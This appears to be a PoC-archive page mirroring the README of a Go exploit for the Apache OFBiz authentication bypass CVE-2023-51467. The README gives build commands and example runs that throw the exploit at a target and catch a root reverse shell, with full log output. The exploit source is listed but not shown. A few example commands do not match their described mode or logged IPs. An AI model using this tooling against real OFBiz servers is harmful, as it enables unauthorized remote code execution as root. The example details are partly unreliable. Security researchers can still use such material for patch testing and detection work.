Related vulnerability
Title:
Apache OFBiz code issue vulnerability
(CVE-2023-51467)
Description: Apache OFBiz is an enterprise resource planning (ERP) system from the Apache Software Foundation (USA). It provides a complete set of Java-based web application components and tools. Apache OFBiz versions before 18.12.11 contain a code issue vulnerability that allows an attacker to bypass authentication and achieve server-side request forgery.
Description
A go-exploit for Apache OFBiz CVE-2023-51467
Introduction
# Go-Exploit for CVE-2023-51467
This repository contains a go-exploit for Apache OFBiz CVE-2023-51467. The implementation contains target verification, a version scanner, and an in-memory Nashorn reverse shell as the payload (this requires that the Java runtime in use supports Nashorn). The weaponization process is described on the [VulnCheck blog](https://vulncheck.com/blog/ofbiz-cve-2023-51467).
# Compiling
You can use the Makefile to build a Docker container:
```sh
make docker
```
Or, if you have a Go build environment ready to go, just use `make`:
```sh
albinolobster@mournland:~/cve-2023-51467$ make
gofmt -d -w cve-2023-51467.go
golangci-lint run --fix cve-2023-51467.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-51467_linux-arm64 cve-2023-51467.go
albinolobster@mournland:~/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -h
An exploit for Apache OFBiz CVE-2023-51467 that can generate a reverse shell or bind shell
```
## Example Usage
### Using Docker
```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ sudo docker run -it --network=host cve-2023-51467 -v -c -e -rhost 10.9.49.88 -rport 8090 -lhost 10.9.49.85 -lport 1270
time=2024-01-03T16:55:19.793-05:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-01-03T16:55:19.999-05:00 level=STATUS msg="Starting TLS listener on 10.9.49.131:1270"
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:21.107-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=STATUS msg="Sending an SSL reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:21.108-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:21.571-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:52582"
time=2024-01-03T16:55:21.571-05:00 level=STATUS msg="Active shell from 10.9.49.121:52582"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:27.546-05:00 level=STATUS msg="Exploit exited with an error"
```
### Encrypted Nashorn Reverse Shell
```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -c -e -rhost 10.9.49.121 -rport 8443 -s -lhost 10.9.49.131 -lport 1270
time=2024-01-03T16:55:19.793-05:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
time=2024-01-03T16:55:19.999-05:00 level=STATUS msg="Starting TLS listener on 10.9.49.131:1270"
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:20.000-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:21.107-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:21.107-05:00 level=STATUS msg="Sending an SSL reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:21.108-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:21.571-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:52582"
time=2024-01-03T16:55:21.571-05:00 level=STATUS msg="Active shell from 10.9.49.121:52582"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:27.546-05:00 level=STATUS msg="Exploit exited with an error"
```
### Unencrypted Reverse Shell
```sh
albinolobster@mournland:~/initial-access/feed/cve-2023-51467$ ./build/cve-2023-51467_linux-arm64 -c -e -rhost 10.9.49.121 -rport 8443 -s -lhost 10.9.49.131 -lport 1270
time=2024-01-03T16:55:51.232-05:00 level=STATUS msg="Starting listener on 10.9.49.131:1270"
time=2024-01-03T16:55:51.233-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.121 port=8443 ssl=true "ssl auto"=false
time=2024-01-03T16:55:51.233-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.121 port=8443
time=2024-01-03T16:55:52.595-05:00 level=VERSION msg="The self-reported version is: 18.12" host=10.9.49.121 port=8443 version=18.12
time=2024-01-03T16:55:52.595-05:00 level=SUCCESS msg="The target *might* be a vulnerable version. Continuing." host=10.9.49.121 port=8443
time=2024-01-03T16:55:52.595-05:00 level=STATUS msg="Sending a reverse shell payload for port 10.9.49.131:1270"
time=2024-01-03T16:55:52.595-05:00 level=STATUS msg="Throwing exploit at https://10.9.49.121:8443/webtools/control/ProgramExport/"
time=2024-01-03T16:55:52.948-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.121:38038"
time=2024-01-03T16:55:52.948-05:00 level=STATUS msg="Active shell from 10.9.49.121:38038"
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
exit
time=2024-01-03T16:55:58.861-05:00 level=STATUS msg="Exploit exited with an error"
```
File snapshot
[4.0K] /data/pocs/e41f30e1befdb5d2b2b54e1ee85547e21b0ece85
├── [6.7K] cve-2023-51467.go
├── [ 466] Dockerfile
├── [ 869] go.mod
├── [4.7K] go.sum
├── [ 11K] LICENSE
├── [2.1K] Makefile
└── [5.3K] README.md
0 directories, 7 files
Notes
1. It is recommended to access the code through the original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.